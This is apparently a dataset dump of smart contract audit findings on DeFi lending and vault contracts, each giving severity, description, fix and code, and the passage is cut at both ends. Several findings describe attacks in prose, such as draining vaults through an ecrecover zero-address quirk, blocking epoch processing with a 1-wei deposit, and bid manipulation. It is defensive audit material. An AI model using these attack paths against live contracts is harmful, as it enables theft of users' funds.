User calls mint and provides amount 1000. That means that he wants to get 1000 principal tokens. While converting to assets, assets = 990. That means that user should pay 990 base tokens to get 1000 principal tokens. Then the `sellUnderlying` is send and slippage provided is `990*0.99=980.1`. So when something happens with price it's possible that user will receive 980.1 principal tokens instead of 1000 which is 2% lost.\\nTo fix this you should provide `s - (s / 100)` as slippage.чUse this.\\n```\\nuint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n s- (s / 100)\\n );\\n```\\nчLost of users funds.ч```\\n function mint(address r, uint256 s) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 assets = Cast.u128(previewMint(s));\\n Safe.transferFrom(\\n IERC20(underlying),\\n msg.sender,\\n address(this),\\n assets\\n );\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n assets,\\n assets - (assets / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n -ERC5095.deposit doesn't check if received shares is less then provided amountчmediumч`ERC5095.deposit` doesn't check if received shares is less then provided amount. In some cases this leads to lost of funds.\\nThe main thing with principal tokens is to buy them when the price is lower (you can buy 101 token while paying only 100 base tokens) as underlying price and then at maturity time to get interest(for example in one month you will get 1 base token in our case).\\n`ERC5095.deposit` function takes amount of base token that user wants to deposit and returns amount of shares that he received. 
To not have loses, the amount of shares should be at least bigger than amount of base tokens provided by user.\\n```\\n function deposit(address r, uint256 a) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 shares = Cast.u128(previewDeposit(a));\\n Safe.transferFrom(IERC20(underlying), msg.sender, address(this), a);\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n Cast.u128(a),\\n shares - (shares / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n\\nWhile calling market place, you can see that slippage of 1 percent is provided.\\n```\\nuint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n Cast.u128(a),\\n shares - (shares / 100)\\n );\\n```\\n\\nBut this is not enough in some cases.\\nFor example we have `ERC5095` token with short maturity which provides `0.5%` of interests. userA calls `deposit` function with 1000 as base amount. He wants to get back 1005 share tokens. And after maturity time earn 5 tokens on this trade.\\nBut because of slippage set to `1%`, it's possible that the price will change and user will receive 995 share tokens instead of 1005, which means that user has lost 5 base tokens.\\nI propose to add one more mechanism except of slippage. 
We need to check if the returned shares amount is bigger than the provided assets amount.чAdd this check at the end `require(returned > a, \"received less than provided\")`чLoss of funds.ч```\\n function deposit(address r, uint256 a) external override returns (uint256) {\\n if (block.timestamp > maturity) {\\n revert Exception(\\n 21,\\n block.timestamp,\\n maturity,\\n address(0),\\n address(0)\\n );\\n }\\n uint128 shares = Cast.u128(previewDeposit(a));\\n Safe.transferFrom(IERC20(underlying), msg.sender, address(this), a);\\n // consider the hardcoded slippage limit, 4626 compliance requires no minimum param.\\n uint128 returned = IMarketPlace(marketplace).sellUnderlying(\\n underlying,\\n maturity,\\n Cast.u128(a),\\n shares - (shares / 100)\\n );\\n _transfer(address(this), r, returned);\\n return returned;\\n }\\n```\\n -Curve LP Controller withdraw and claim function uses wrong signatureчmediumчThe function signatures used for `WITHDRAWCLAIM` in both CurveLPStakingController.sol and BalancerLPStakingController.sol are incorrect, leading to the function not succeeding.\\nIn both the CurveLPStakingController.sol and BalancerLPStakingController.sol contracts, the function selector `0x00ebf5dd` is used for `WITHDRAWCLAIM`. This selector corresponds to a function signature of `withdraw(uint256,address,bool)`.\\n```\\nbytes4 constant WITHDRAWCLAIM = 0x00ebf5dd;\\n```\\n\\nHowever, the `withdraw()` function in the Curve contract does not have an address argument. Instead, the function signature reads `withdraw(uint256,bool)`, which corresponds to a function selector of `0x38d07436`.чChange the function selector in both contracts to `0x38d07436`.чUsers who have deposited assets into Curve pools will not be able to claim their rewards when they withdraw their tokens.ч```\\nbytes4 constant WITHDRAWCLAIM = 0x00ebf5dd;\\n```\\n -Strategist nonce is not checkedчmediumчStrategist nonce is not checked while checking commitment. 
This makes it impossible for the strategist to cancel a signed commitment.\\n`VaultImplementation.commitToLien` is created to give the ability to borrow from the vault. The conditions of loan are discussed off chain and owner or delegate of the vault then creates and signs deal details. Later borrower can provide it as `IAstariaRouter.Commitment calldata params` param to `VaultImplementation.commitToLien`.\\nAfter the checking of signer of commitment `VaultImplementation._validateCommitment` function calls `AstariaRouter.validateCommitment`.\\n```\\n function validateCommitment(IAstariaRouter.Commitment calldata commitment)\\n public\\n returns (bool valid, IAstariaRouter.LienDetails memory ld)\\n {\\n require(\\n commitment.lienRequest.strategy.deadline >= block.timestamp,\\n \"deadline passed\"\\n );\\n\\n\\n require(\\n strategyValidators[commitment.lienRequest.nlrType] != address(0),\\n \"invalid strategy type\"\\n );\\n\\n\\n bytes32 leaf;\\n (leaf, ld) = IStrategyValidator(\\n strategyValidators[commitment.lienRequest.nlrType]\\n ).validateAndParse(\\n commitment.lienRequest,\\n COLLATERAL_TOKEN.ownerOf(\\n commitment.tokenContract.computeId(commitment.tokenId)\\n ),\\n commitment.tokenContract,\\n commitment.tokenId\\n );\\n\\n\\n return (\\n MerkleProof.verifyCalldata(\\n commitment.lienRequest.merkle.proof,\\n commitment.lienRequest.merkle.root,\\n leaf\\n ),\\n ld\\n );\\n }\\n```\\n\\nThis function checks additional params, one of which is `commitment.lienRequest.strategy.deadline`. But it doesn't check for the nonce of the strategist here. But this nonce is used while signing.\\nAlso `AstariaRouter` gives ability to increment nonce for strategist, but it is never called. That means that currently the strategist always uses the same nonce and can't cancel his commitment.чGive ability to strategist to call `increaseNonce` function.чStrategist can't cancel his commitment. 
User can use this commitment to borrow up to 5 times.ч```\\n function validateCommitment(IAstariaRouter.Commitment calldata commitment)\\n public\\n returns (bool valid, IAstariaRouter.LienDetails memory ld)\\n {\\n require(\\n commitment.lienRequest.strategy.deadline >= block.timestamp,\\n \"deadline passed\"\\n );\\n\\n\\n require(\\n strategyValidators[commitment.lienRequest.nlrType] != address(0),\\n \"invalid strategy type\"\\n );\\n\\n\\n bytes32 leaf;\\n (leaf, ld) = IStrategyValidator(\\n strategyValidators[commitment.lienRequest.nlrType]\\n ).validateAndParse(\\n commitment.lienRequest,\\n COLLATERAL_TOKEN.ownerOf(\\n commitment.tokenContract.computeId(commitment.tokenId)\\n ),\\n commitment.tokenContract,\\n commitment.tokenId\\n );\\n\\n\\n return (\\n MerkleProof.verifyCalldata(\\n commitment.lienRequest.merkle.proof,\\n commitment.lienRequest.merkle.root,\\n leaf\\n ),\\n ld\\n );\\n }\\n```\\n -The implied value of a public vault can be impaired, liquidity providers can lose fundsчhighчThe implied value of a public vault can be impaired, liquidity providers can lose funds\\nBorrowers can partially repay their liens, which is handled by the `_payment` function (LienToken.sol#L594). 
When repaying a part of a lien, `lien.amount` is updated to include currently accrued debt (LienToken.sol#L605-L617):\\n```\\nLien storage lien = lienData[lienId];\\nlien.amount = _getOwed(lien); // @audit current debt, including accrued interest; saved to storage!\\n```\\n\\nNotice that `lien.amount` is updated in storage, and `lien.last` wasn't updated.\\nThen, lien's slope is subtracted from vault's slope accumulator to be re-calculated after the repayment (LienToken.sol#L620-L630):\\n```\\nif (isPublicVault) {\\n // @audit calculates and subtracts lien's slope from vault's slope\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n}\\nif (lien.amount > paymentAmount) {\\n lien.amount -= paymentAmount;\\n // @audit lien.last is updated only after payment amount subtraction\\n lien.last = block.timestamp.safeCastTo32();\\n // slope does not need to be updated if paying off the rest, since we neutralize slope in beforePayment()\\n if (isPublicVault) {\\n // @audit re-calculates and re-applies lien's slope after the repayment\\n IPublicVault(lienOwner).afterPayment(lienId);\\n }\\n}\\n```\\n\\nIn the `beforePayment` function, `LIEN_TOKEN().calculateSlope(lienId)` is called to calculate lien's current slope (PublicVault.sol#L433-L442):\\n```\\nfunction beforePayment(uint256 lienId, uint256 amount) public onlyLienToken {\\n _handleStrategistInterestReward(lienId, amount);\\n uint256 lienSlope = LIEN_TOKEN().calculateSlope(lienId);\\n if (lienSlope > slope) {\\n slope = 0;\\n } else {\\n slope -= lienSlope;\\n }\\n last = block.timestamp;\\n}\\n```\\n\\nThe `calculateSlope` function reads a lien from storage and calls `_getOwed` again (LienToken.sol#L440-L445):\\n```\\nfunction calculateSlope(uint256 lienId) public view returns (uint256) {\\n // @audit lien.amount includes interest accrued so far\\n Lien memory lien = lienData[lienId];\\n uint256 end = (lien.start + lien.duration);\\n uint256 owedAtEnd = _getOwed(lien, end);\\n // @audit lien.last wasn't 
updated in `_payment`, it's an older timestamp\\n return (owedAtEnd - lien.amount).mulDivDown(1, end - lien.last);\\n}\\n```\\n\\nThis is where double counting of accrued interest happens. Recall that lien's amount already includes the interest that was accrued by this moment (in the `_payment` function). Now, interest is calculated again and is applied to the amount that already includes (a portion) it (LienToken.sol#L544-L550):\\n```\\nfunction _getOwed(Lien memory lien, uint256 timestamp)\\n internal\\n view\\n returns (uint256)\\n{\\n // @audit lien.amount already includes interest accrued so far\\n return lien.amount + _getInterest(lien, timestamp);\\n}\\n```\\n\\nLienToken.sol#L177-L196:\\n```\\nfunction _getInterest(Lien memory lien, uint256 timestamp)\\n internal\\n view\\n returns (uint256)\\n{\\n if (!lien.active) {\\n return uint256(0);\\n }\\n uint256 delta_t;\\n if (block.timestamp >= lien.start + lien.duration) {\\n delta_t = uint256(lien.start + lien.duration - lien.last);\\n } else {\\n // @audit lien.last wasn't updated in `_payment`, so the `delta_t` is bigger here\\n delta_t = uint256(timestamp.safeCastTo32() - lien.last);\\n }\\n return\\n // @audit rate applied to a longer delta_t and multiplied by a bigger amount than expected\\n delta_t.mulDivDown(lien.rate, 1).mulDivDown(\\n lien.amount,\\n INTEREST_DENOMINATOR\\n );\\n}\\n```\\nчIn the `_payment` function, consider updating `lien.amount` after the `beforePayment` call:\\n```\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/src/LienToken.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/LienToken.sol\\n@@ // Remove the line below\\n614,12 // Add the line below\\n614,13 @@ contract LienToken is ERC721, ILienToken, Auth, TransferAgent {\\n type(IPublicVault).interfaceId\\n );\\n\\n// Remove the line below\\n lien.amount = _getOwed(lien);\\n// Remove the line below\\n\\n address payee = getPayee(lienId);\\n if 
(isPublicVault) {\\n IPublicVault(lienOwner).beforePayment(lienId, paymentAmount);\\n }\\n// Add the line below\\n\\n// Add the line below\\n lien.amount = _getOwed(lien);\\n// Add the line below\\n\\n if (lien.amount > paymentAmount) {\\n lien.amount // Remove the line below\\n= paymentAmount;\\n lien.last = block.timestamp.safeCastTo32();\\n```\\n\\nIn this case, lien's slope calculation won't be affected in the `beforePayment` call and the correct slope will be removed from the slope accumulator.чDouble counting of interest will result in a wrong lien slope, which will affect the vault's slope accumulator. This will result in an invalid implied value of a vault (PublicVault.sol#L406-L413):\\nIf miscalculated lien slope is bigger than expected, vault's slope will be smaller than expected (due to the subtraction in beforePayment), and vault's implied value will also be smaller. Liquidity providers will lose money because they won't be able to redeem the whole liquidity (vault's implied value, `totalAssets`, is used in the conversion of LP shares, ERC4626-Cloned.sol#L392-L412)\\nIf miscalculated lien slope is smaller than expected, vault's slope will be higher, and vaults implied value will also be higher. However, it won't be backed by actual liquidity, thus the liquidity providers that exit earlier will get a bigger share of the underlying assets. 
The last liquidity provider won't be able to get their entire share.ч```\\nLien storage lien = lienData[lienId];\\nlien.amount = _getOwed(lien); // @audit current debt, including accrued interest; saved to storage!\\n```\\n -buyoutLien() will cause the vault to fail to processEpoch()чhighчLienToken#buyoutLien() did not reduce vault#liensOpenForEpoch when vault#processEpoch()will check vault#liensOpenForEpoch[currentEpoch] == uint256(0) so processEpoch() will fail\\nwhen create LienToken , vault#liensOpenForEpoch[currentEpoch] will ++ when repay or liquidate , vault#liensOpenForEpoch[currentEpoch] will -- and LienToken#buyoutLien() will transfer from vault to to other receiver,so liensOpenForEpoch need reduce\\n```\\nfunction buyoutLien(ILienToken.LienActionBuyout calldata params) external {\\n // rest of code.\\n /**** tranfer but not liensOpenForEpoch-- *****/\\n _transfer(ownerOf(lienId), address(params.receiver), lienId);\\n }\\n```\\nчIssue buyoutLien() will cause the vault to fail to processEpoch()\\n```\\n function buyoutLien(ILienToken.LienActionBuyout calldata params) external {\\n// rest of code.\\n\\n+ //do decreaseEpochLienCount()\\n+ address lienOwner = ownerOf(lienId);\\n+ bool isPublicVault = IPublicVault(lienOwner).supportsInterface(\\n+ type(IPublicVault).interfaceId\\n+ );\\n+ if (isPublicVault && !AUCTION_HOUSE.auctionExists(collateralId)) { \\n+ IPublicVault(lienOwner).decreaseEpochLienCount(\\n+ IPublicVault(lienOwner).getLienEpoch(lienData[lienId].start + lienData[lienId].duration)\\n+ );\\n+ } \\n\\n lienData[lienId].last = block.timestamp.safeCastTo32();\\n lienData[lienId].start = block.timestamp.safeCastTo32();\\n lienData[lienId].rate = ld.rate.safeCastTo240();\\n lienData[lienId].duration = ld.duration.safeCastTo32();\\n _transfer(ownerOf(lienId), address(params.receiver), lienId);\\n }\\n```\\nчprocessEpoch() maybe failч```\\nfunction buyoutLien(ILienToken.LienActionBuyout calldata params) external {\\n // rest of code.\\n /**** tranfer 
but not liensOpenForEpoch-- *****/\\n _transfer(ownerOf(lienId), address(params.receiver), lienId);\\n }\\n```\\n -_deleteLienPosition can be called by anyone to delete any lien they wishчhighч`_deleteLienPosition` is a public function that doesn't check the caller. This allows anyone to call it an remove whatever lien they wish from whatever collateral they wish\\n```\\nfunction _deleteLienPosition(uint256 collateralId, uint256 position) public {\\n uint256[] storage stack = liens[collateralId];\\n require(position < stack.length, \"index out of bounds\");\\n\\n emit RemoveLien(\\n stack[position],\\n lienData[stack[position]].collateralId,\\n lienData[stack[position]].position\\n );\\n for (uint256 i = position; i < stack.length - 1; i++) {\\n stack[i] = stack[i + 1];\\n }\\n stack.pop();\\n}\\n```\\n\\n`_deleteLienPosition` is a `public` function and doesn't validate that it's being called by any permissioned account. The result is that anyone can call it to delete any lien that they want. 
It wouldn't remove the lien data but it would remove it from the array associated with `collateralId`, which would allow it to pass the `CollateralToken.sol#releaseCheck` and the underlying to be withdrawn by the user.чChange `_deleteLienPosition` to `internal` rather than `public`.чAll liens can be deleted completely rugging lendersч```\\nfunction _deleteLienPosition(uint256 collateralId, uint256 position) public {\\n uint256[] storage stack = liens[collateralId];\\n require(position < stack.length, \"index out of bounds\");\\n\\n emit RemoveLien(\\n stack[position],\\n lienData[stack[position]].collateralId,\\n lienData[stack[position]].position\\n );\\n for (uint256 i = position; i < stack.length - 1; i++) {\\n stack[i] = stack[i + 1];\\n }\\n stack.pop();\\n}\\n```\\n -Public vaults can become insolvent because of missing `yIntercept` updateчhighчThe deduction of `yIntercept` during payments is missing in `beforePayment()` which can lead to vault insolvency.\\n`yIntercept` is declared as \"sum of all LienToken amounts\" and documented elsewhere as \"yIntercept (virtual assets) of a PublicVault\". It is used to calculate the total assets of a public vault as: slope.mulDivDown(delta_t, 1) + `yIntercept`.\\nIt is expected to be updated on deposits, payments, withdrawals, liquidations. However, the deduction of `yIntercept` during payments is missing in `beforePayment()`. 
As noted in the function's Natspec:\\n```\\n /**\\n * @notice Hook to update the slope and yIntercept of the PublicVault on payment.\\n * The rate for the LienToken is subtracted from the total slope of the PublicVault, and recalculated in afterPayment().\\n * @param lienId The ID of the lien.\\n * @param amount The amount paid off to deduct from the yIntercept of the PublicVault.\\n */\\n```\\n\\nthe amount of payment should be deducted from `yIntercept` but is missing.чIssue Public vaults can become insolvent because of missing `yIntercept` update\\nUpdate `yIntercept` in `beforePayment()` by the `amount` value.чThis missing update will inflate the inferred value of the public vault corresponding to its actual value leading to eventual insolvency because of resulting protocol miscalculations.ч```\\n /**\\n * @notice Hook to update the slope and yIntercept of the PublicVault on payment.\\n * The rate for the LienToken is subtracted from the total slope of the PublicVault, and recalculated in afterPayment().\\n * @param lienId The ID of the lien.\\n * @param amount The amount paid off to deduct from the yIntercept of the PublicVault.\\n */\\n```\\n -Bidder can cheat auction by placing bid much higher than reserve price when there are still open liens against a tokenчhighчWhen a token still has open liens against it only the value of the liens will be paid by the bidder but their current bid will be set to the full value of the bid. This can be abused in one of two ways. 
The bidder could place a massive bid like 500 ETH that will never be outbid or they could place a bid they know will outbid and profit the difference when they're sent a refund.\\n```\\nuint256[] memory liens = LIEN_TOKEN.getLiens(tokenId);\\nuint256 totalLienAmount = 0;\\nif (liens.length > 0) {\\n for (uint256 i = 0; i < liens.length; ++i) {\\n uint256 payment;\\n uint256 lienId = liens[i];\\n\\n ILienToken.Lien memory lien = LIEN_TOKEN.getLien(lienId);\\n\\n if (transferAmount >= lien.amount) {\\n payment = lien.amount;\\n transferAmount -= payment;\\n } else {\\n payment = transferAmount;\\n transferAmount = 0;\\n }\\n if (payment > 0) {\\n LIEN_TOKEN.makePayment(tokenId, payment, lien.position, payer);\\n }\\n }\\n} else {\\n //@audit-issue logic skipped if liens.length > 0\\n TRANSFER_PROXY.tokenTransferFrom(\\n weth,\\n payer,\\n COLLATERAL_TOKEN.ownerOf(tokenId),\\n transferAmount\\n );\\n}\\n```\\n\\nWe can examine the payment logic inside `_handleIncomingPayment` and see that if there are still open liens against then only the amount of WETH to pay back the liens will be taken from the payer, since the else portion of the logic will be skipped.\\n```\\nuint256 vaultPayment = (amount - currentBid);\\n\\nif (firstBidTime == 0) {\\n auctions[tokenId].firstBidTime = block.timestamp.safeCastTo64();\\n} else if (lastBidder != address(0)) {\\n uint256 lastBidderRefund = amount - vaultPayment;\\n _handleOutGoingPayment(lastBidder, lastBidderRefund);\\n}\\n_handleIncomingPayment(tokenId, vaultPayment, address(msg.sender));\\n\\nauctions[tokenId].currentBid = amount;\\nauctions[tokenId].bidder = address(msg.sender);\\n```\\n\\nIn `createBid`, `auctions[tokenId].currentBid` is set to `amount` after the last bidder is refunded and the excess is paid against liens. We can walk through an example to illustrate this:\\nAssume a token with a single lien of amount 10 WETH and an auction is opened for that token. Now a user places a bid for 20 WETH. 
They are the first bidder so `lastBidder = address(0)` and `currentBid = 0`. `_handleIncomingPayment` will be called with a value of 20 WETH since there is no lastBidder to refund. Inside `_handleIncomingPayment` the lien information is read showing 1 lien against the token. Since `transferAmount >= lien.amount`, `payment = lien.amount`. A payment will be made by the bidder against the lien for 10 WETH. After the payment `_handleIncomingPayment` will return only having taken 10 WETH from the bidder. In the next line currentBid is set to 20 WETH but the bidder has only paid 10 WETH. Now if they are outbid, the new bidder will have to refund them 20 WETH even though they initially only paid 10 WETH.чIn `_handleIncomingPayment`, all residual transfer amount should be sent to `COLLATERAL_TOKEN.ownerOf(tokenId)`.чBidder can steal funds due to `_handleIncomingPayment` not taking enough WETHч```\\nuint256[] memory liens = LIEN_TOKEN.getLiens(tokenId);\\nuint256 totalLienAmount = 0;\\nif (liens.length > 0) {\\n for (uint256 i = 0; i < liens.length; ++i) {\\n uint256 payment;\\n uint256 lienId = liens[i];\\n\\n ILienToken.Lien memory lien = LIEN_TOKEN.getLien(lienId);\\n\\n if (transferAmount >= lien.amount) {\\n payment = lien.amount;\\n transferAmount -= payment;\\n } else {\\n payment = transferAmount;\\n transferAmount = 0;\\n }\\n if (payment > 0) {\\n LIEN_TOKEN.makePayment(tokenId, payment, lien.position, payer);\\n }\\n }\\n} else {\\n //@audit-issue logic skipped if liens.length > 0\\n TRANSFER_PROXY.tokenTransferFrom(\\n weth,\\n payer,\\n COLLATERAL_TOKEN.ownerOf(tokenId),\\n transferAmount\\n );\\n}\\n```\\n -Possible to fully block PublicVault.processEpoch function. No one will be able to receive their fundsчhighчPossible to fully block `PublicVault.processEpoch` function. 
No one will be able to receive their funds\\nWhen liquidity providers want to redeem their share from `PublicVault` they call `redeemFutureEpoch` function which will create new `WithdrawProxy` for the epoch(if not created already) and then mint shares for redeemer in `WithdrawProxy`. `PublicVault` transfer user's shares to himself.\\n```\\n function redeemFutureEpoch(\\n uint256 shares,\\n address receiver,\\n address owner,\\n uint64 epoch\\n ) public virtual returns (uint256 assets) {\\n // check to ensure that the requested epoch is not the current epoch or in the past\\n require(epoch >= currentEpoch, \"Exit epoch too low\");\\n\\n\\n require(msg.sender == owner, \"Only the owner can redeem\");\\n // check for rounding error since we round down in previewRedeem.\\n\\n\\n ERC20(address(this)).safeTransferFrom(owner, address(this), shares);\\n\\n\\n // Deploy WithdrawProxy if no WithdrawProxy exists for the specified epoch\\n _deployWithdrawProxyIfNotDeployed(epoch);\\n\\n\\n emit Withdraw(msg.sender, receiver, owner, assets, shares);\\n\\n\\n // WithdrawProxy shares are minted 1:1 with PublicVault shares\\n WithdrawProxy(withdrawProxies[epoch]).mint(receiver, shares); // was withdrawProxies[withdrawEpoch]\\n }\\n```\\n\\nThis function mints `WithdrawProxy` shares 1:1 to redeemed `PublicVault` shares. 
Then later after call of `processEpoch` and `transferWithdrawReserve` the funds will be sent to the `WithdrawProxy` and users can now redeem their shares from it.\\nFunction `processEpoch` decides how many funds should be sent to the `WithdrawProxy`.\\n```\\n if (withdrawProxies[currentEpoch] != address(0)) {\\n uint256 proxySupply = WithdrawProxy(withdrawProxies[currentEpoch])\\n .totalSupply();\\n\\n\\n liquidationWithdrawRatio = proxySupply.mulDivDown(1e18, totalSupply());\\n\\n\\n if (liquidationAccountants[currentEpoch] != address(0)) {\\n LiquidationAccountant(liquidationAccountants[currentEpoch])\\n .setWithdrawRatio(liquidationWithdrawRatio);\\n }\\n\\n\\n uint256 withdrawAssets = convertToAssets(proxySupply);\\n // compute the withdrawReserve\\n uint256 withdrawLiquidations = liquidationsExpectedAtBoundary[\\n currentEpoch\\n ].mulDivDown(liquidationWithdrawRatio, 1e18);\\n withdrawReserve = withdrawAssets - withdrawLiquidations;\\n // burn the tokens of the LPs withdrawing\\n _burn(address(this), proxySupply);\\n\\n\\n _decreaseYIntercept(withdrawAssets);\\n }\\n```\\n\\nThis is how it is decided how much money should be sent to WithdrawProxy. Firstly, we look at totalSupply of WithdrawProxy. `uint256 proxySupply = WithdrawProxy(withdrawProxies[currentEpoch]).totalSupply();`.\\nAnd then we convert them to assets amount. `uint256 withdrawAssets = convertToAssets(proxySupply);`\\nIn the end function burns `proxySupply` amount of shares controlled by PublicVault. `_burn(address(this), proxySupply);`\\nThen this amount is allowed to be sent(if no auctions currently, but this is not important right now).\\nThis all allows to attacker to make `WithdrawProxy.deposit` to mint new shares for him and increase totalSupply of WithdrawProxy, so `proxySupply` becomes more then was sent to `PublicVault`.\\nThis is attack scenario.\\n1.PublicVault is created and funded with 50 ethers. 
2.Someone calls `redeemFutureEpoch` function to create new WithdrawProxy for next epoch. 3.Attacker sends 1 wei to WithdrawProxy to make totalAssets be > 0. Attacker deposits to WithdrawProxy 1 wei. Now WithdrawProxy.totalSupply > PublicVault.balanceOf(PublicVault). 4.Someone calls `processEpoch` and it reverts on burning.\\nAs a result, nothing will be sent to WithdrawProxy where shares were minted for users. They just lost money.\\nAlso this attack can be improved to drain users' funds to attacker. Attacker should be liquidity provider. And he can initiate next redeem for next epoch, then deposit to new WithdrawProxy enough amount to get new shares. And call `processEpoch` which will send to the vault amount, that was not sent to previous attacked WithdrawProxy, as well. So attacker will take those funds.чMake function WithdrawProxy.deposit not callable.чFunds of PublicVault depositors are stolen.ч```\\n function redeemFutureEpoch(\\n uint256 shares,\\n address receiver,\\n address owner,\\n uint64 epoch\\n ) public virtual returns (uint256 assets) {\\n // check to ensure that the requested epoch is not the current epoch or in the past\\n require(epoch >= currentEpoch, \"Exit epoch too low\");\\n\\n\\n require(msg.sender == owner, \"Only the owner can redeem\");\\n // check for rounding error since we round down in previewRedeem.\\n\\n\\n ERC20(address(this)).safeTransferFrom(owner, address(this), shares);\\n\\n\\n // Deploy WithdrawProxy if no WithdrawProxy exists for the specified epoch\\n _deployWithdrawProxyIfNotDeployed(epoch);\\n\\n\\n emit Withdraw(msg.sender, receiver, owner, assets, shares);\\n\\n\\n // WithdrawProxy shares are minted 1:1 with PublicVault shares\\n WithdrawProxy(withdrawProxies[epoch]).mint(receiver, shares); // was withdrawProxies[withdrawEpoch]\\n }\\n```\\n -Any public vault without a delegate can be drainedчhighчIf a public vault is created without a delegate, delegate will have the value of `address(0)`. 
This is also the value returned by `ecrecover` for invalid signatures (for example, if v is set to a positive number that is not 27 or 28), which allows a malicious actor to cause the signature validation to pass for arbitrary parameters, allowing them to drain a vault using a worthless NFT as collateral.\\nWhen a new Public Vault is created, the Router calls the `init()` function on the vault as follows:\\n```\\nVaultImplementation(vaultAddr).init(\\n VaultImplementation.InitParams(delegate)\\n);\\n```\\n\\nIf a delegate wasn't set, this will pass `address(0)` to the vault. If this value is passed, the vault simply skips the assignment, keeping the delegate variable set to the default 0 value:\\n```\\nif (params.delegate != address(0)) {\\n delegate = params.delegate;\\n}\\n```\\n\\nOnce the delegate is set to the zero address, any commitment can be validated, even if the signature is incorrect. This is because of a quirk in `ecrecover` which returns `address(0)` for invalid signatures. A signature can be made invalid by providing a positive integer that is not 27 or 28 as the `v` value. The result is that the following function call assigns recovered = address(0):\\n```\\n address recovered = ecrecover(\\n keccak256(\\n encodeStrategyData(\\n params.lienRequest.strategy,\\n params.lienRequest.merkle.root\\n )\\n ),\\n params.lienRequest.v,\\n params.lienRequest.r,\\n params.lienRequest.s\\n );\\n```\\n\\nTo confirm the validity of the signature, the function performs two checks:\\n```\\nrequire(\\n recovered == params.lienRequest.strategy.strategist,\\n \"strategist must match signature\"\\n);\\nrequire(\\n recovered == owner() || recovered == delegate,\\n \"invalid strategist\"\\n);\\n```\\n\\nThese can be easily passed by setting the `strategist` in the params to `address(0)`. 
At this point, all checks will pass and the parameters will be accepted as approved by the vault.\\nWith this power, a borrower can create params that allow them to borrow the vault's full funds in exchange for a worthless NFT, allowing them to drain the vault and steal all the user's funds.чIssue Any public vault without a delegate can be drained\\nAdd a require statement that the recovered address cannot be the zero address:\\n```\\nrequire(recovered != address(0));\\n```\\nчAll user's funds held in a vault with no delegate set can be stolen.ч```\\nVaultImplementation(vaultAddr).init(\\n VaultImplementation.InitParams(delegate)\\n);\\n```\\n -Auctions can end in epoch after intended, underpaying withdrawersчhighчWhen liens are liquidated, the router checks if the auction will complete in a future epoch and, if it does, sets up a liquidation accountant and other logistics to account for it. However, the check for auction completion does not take into account extended auctions, which can therefore end in an unexpected epoch and cause accounting issues, losing user funds.\\nThe liquidate() function performs the following check to determine if it should set up the liquidation to be paid out in a future epoch:\\n```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n\\nThis function assumes that the auction will only end in a future epoch if the `auctionWindow` (typically set to 2 days) pushes us into the next epoch.\\nHowever, auctions can last up to an additional 1 day if bids are made within the final 15 minutes. 
In these cases, auctions are extended repeatedly, up to a maximum of 1 day.\\n```\\nif (firstBidTime + duration - block.timestamp < timeBuffer) {\\n uint64 newDuration = uint256(\\n duration + (block.timestamp + timeBuffer - firstBidTime)\\n ).safeCastTo64();\\n if (newDuration <= auctions[tokenId].maxDuration) {\\n auctions[tokenId].duration = newDuration;\\n } else {\\n auctions[tokenId].duration =\\n auctions[tokenId].maxDuration -\\n firstBidTime;\\n }\\n extended = true;\\n}\\n```\\n\\nThe result is that there are auctions for which accounting is set up for them to end in the current epoch, but will actual end in the next epoch.чChange the check to take the possibility of extension into account:\\n```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow() + 1 days)\\n```\\nчUsers who withdrew their funds in the current epoch, who are entitled to a share of the auction's proceeds, will not be paid out fairly.ч```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n -Strategists are paid 10x the vault fee because of a math errorчhighчStrategists set their vault fee in BPS (x / 10,000), but are paid out as x / 1,000. The result is that strategists will always earn 10x whatever vault fee they set.\\nWhenever any payment is made towards a public vault, `beforePayment()` is called, which calls `_handleStrategistInterestReward()`.\\nThe function is intended to take the amount being paid, adjust by the vault fee to get the fee amount, and convert that amount of value into shares, which are added to `strategistUnclaimedShares`.\\n```\\nfunction _handleStrategistInterestReward(uint256 lienId, uint256 amount)\\n internal\\n virtual\\n override\\n {\\n if (VAULT_FEE() != uint256(0)) {\\n uint256 interestOwing = LIEN_TOKEN().getInterest(lienId);\\n uint256 x = (amount > interestOwing) ? 
interestOwing : amount;\\n uint256 fee = x.mulDivDown(VAULT_FEE(), 1000);\\n strategistUnclaimedShares += convertToShares(fee);\\n }\\n }\\n```\\n\\nSince the vault fee is stored in basis points, to get the vault fee, we should take the amount, multiply it by `VAULT_FEE()` and divide by 10,000. However, we accidentally divide by 1,000, which results in a 10x larger reward for the strategist than intended.\\nAs an example, if the vault fee is intended to be 10%, we would set `VAULT_FEE = 1000`. In that case, for any amount paid off, we would calculate `fee = amount * 1000 / 1000` and the full amount would be considered a fee for the strategist.чChange the `1000` in the `_handleStrategistInterestReward()` function to `10_000`.чStrategists will be paid 10x the agreed upon rate for their role, with the cost being borne by users.ч```\\nfunction _handleStrategistInterestReward(uint256 lienId, uint256 amount)\\n internal\\n virtual\\n override\\n {\\n if (VAULT_FEE() != uint256(0)) {\\n uint256 interestOwing = LIEN_TOKEN().getInterest(lienId);\\n uint256 x = (amount > interestOwing) ? interestOwing : amount;\\n uint256 fee = 